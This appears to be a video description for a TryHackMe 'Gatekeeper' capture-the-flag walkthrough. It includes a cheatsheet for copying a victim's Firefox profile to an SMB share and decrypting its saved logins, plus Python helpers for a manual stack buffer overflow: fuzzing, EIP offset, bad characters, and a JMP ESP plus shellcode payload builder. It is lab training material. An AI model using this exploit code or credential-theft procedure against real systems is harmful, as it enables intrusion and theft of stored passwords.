Gatekeeper | TryHackMe | Without Metasploit
Reverse engineering gatekeeper.exe with Immunity Debugger and Mona, exploiting it with a stack buffer overflow, and then manually escalating privileges without Metasploit.

Commands cheatsheet

On the target (Windows), copy the Firefox profile to the share:
xcopy "C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release" "C:\Users\Share\firefox" /E /I
I recommend adding \firefox to the destination path to keep the copy tidy.

Mount the SMB share on your Kali box ("share" is the name of a local folder you create first as the mount point; mount.cifs will prompt for a password, just press Enter for the guest account):
sudo mount -t cifs //TargetSMBIP/Users share -o 'rw,username=guest'

firefox_decrypt by Unode on GitHub (decrypts the saved logins stored in the profile's key4.db and logins.json): https://github[.]com/unode/firefox_decrypt

Room: https://tryhackme.com/r/room/gatekeeper
Buffer Overflow Prep Room: https://tryhackme.com/r/room/bufferoverflowprep
Buffer Overflow guide by @TCMSecurityAcademy: https://www.youtube.com/watch?v=ncBblM920jw

Background Music:
Creator Mix Mellow - https://creatormix.com/album/mellow-61.html
Mellow 2 - https://creatormix.com/album/mellow-two-78.html

TryHackMe: https://tryhackme.com/p/Bsaro
LinkedIn: https://www.linkedin.com/in/babyka-saroeun/

Chapters
0:00 - Intro
1:39 - Nmap and tips for doing the buffer overflow
5:08 - SMB enumeration
8:00 - Download gatekeeper.exe from the target to the local Windows VM
10:40 - Store mona.py and set up Immunity Debugger
11:40 - Review the Nmap result
12:40 - Fuzzing the executable
17:13 - Find the EIP offset
21:00 - Find bad characters
28:28 - Find a jump point (JMP ESP), configure exploit.py and run the buffer overflow
29:33 - Buffer overflow exploit against the target machine and Windows enumeration
32:15 - Follow the room to find a possible escalation vector
33:20 - Looking at the Firefox profile
35:50 - Mount the SMB share on local Kali
38:00 - Manually copy the Firefox profile to the SMB share
39:05 - Decrypt the Firefox saved logins to find credentials
42:40 - Connect with the credentials using Impacket psexec
45:00 - xfreerdp with the credentials
47:55 - Quick explanation of the Metasploit approach (no demo) and rambling about the update
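The buffer-overflow chapters above (fuzzing, EIP offset, bad characters, JMP ESP, exploit.py) follow one manual workflow, and the point of the video is doing it without Metasploit. Below is an added Python example of the helpers that workflow needs; it is not the exploit.py from the video. The target IP and port, the offset, the JMP ESP address and the shellcode are placeholders you replace with what nmap, Immunity Debugger and mona give you; the cyclic pattern functions stand in for Metasploit's pattern_create / pattern_offset.

```python
# Added example: helpers for the manual stack-overflow workflow against
# gatekeeper.exe (fuzz -> EIP offset -> bad chars -> JMP ESP -> payload).
# Not the video's exploit.py. Every address, offset and port below is a
# placeholder to be replaced with what Immunity Debugger / mona report.
import socket
import string
import struct

TARGET_IP = "10.10.10.10"   # placeholder: the TryHackMe target
TARGET_PORT = 31337         # placeholder: the port you found with nmap


def send_payload(data, host=TARGET_IP, port=TARGET_PORT, timeout=5, terminator=b"\r\n"):
    """Connect, read the banner, send one payload. Returns the banner bytes
    (empty if the service is already dead, i.e. the previous crash stuck)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            banner = s.recv(1024)
        except socket.timeout:
            banner = b""
        s.sendall(data + terminator)
    return banner


def fuzz_lengths(start=100, step=100, stop=2000):
    """Payload sizes to try one by one; the size that hangs the service is
    roughly where the overflow happens, so the cyclic pattern is sent next."""
    return list(range(start, stop + 1, step))


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1...), built without Metasploit.
    Every 4-byte window is unique, which is what lets EIP map to an offset."""
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value, length=20000):
    """EIP as shown in Immunity (e.g. 0x39654138) -> offset into the pattern.
    The register holds the bytes little-endian, so pack it that way first.
    Returns -1 when the value is not from the pattern (EIP was not controlled)."""
    return pattern_create(length).find(struct.pack("<I", eip_value))


def badchar_bytes(exclude=(0x00,)):
    """The 0x01..0xff byte array sent after the EIP overwrite; mona's
    '!mona bytearray -cpb "\\x00"' produces the same thing. 0x00 is excluded
    up front since it terminates C strings in nearly every target."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def find_first_badchar(sent, dumped):
    """Compare what was sent against the stack dump (follow ESP in the dump).
    Only the FIRST mismatch is meaningful: a bad char usually truncates or
    shifts everything after it, so remove that byte from the array, resend
    and repeat until this returns None."""
    for s, d in zip(sent, dumped):
        if s != d:
            return s
    return None


def build_payload(offset, jmp_esp, shellcode, prefix=b"", nop_count=16):
    """offset   : bytes until EIP (from pattern_offset)
       jmp_esp  : address of a JMP ESP in a module without ASLR/rebasing and
                  without bad chars in its bytes (!mona jmp -r esp -cpb "...")
       shellcode: msfvenom output generated with -b '<badchars>'"""
    payload = prefix + b"A" * offset
    payload += struct.pack("<I", jmp_esp)   # little-endian, overwrites EIP
    payload += b"\x90" * nop_count          # NOP sled so the decoder has room
    payload += shellcode
    return payload


if __name__ == "__main__":
    # Stage 1: send increasing fuzz_lengths() of b"A" until the service hangs.
    # Stage 2: send pattern_create(<crash size>), read EIP in Immunity and
    #          pass it to pattern_offset().
    # Stage 3: send b"A"*offset + b"BBBB" + badchar_bytes(), follow ESP in
    #          the dump and use find_first_badchar() until it returns None.
    # Stage 4: build_payload() with mona's JMP ESP and msfvenom shellcode.
    demo = build_payload(offset=100, jmp_esp=0x080414C3,
                         shellcode=b"\xcc" * 4, nop_count=4)   # placeholders
    print(len(demo), demo[:8])
```

The EIP value is typed into pattern_offset() exactly as Immunity displays it; the little-endian packing inside the function is what makes the four bytes match the pattern string. A return of -1 means EIP was not overwritten by the pattern at all, so the crash size or the fuzzing step needs another look before moving on to bad characters.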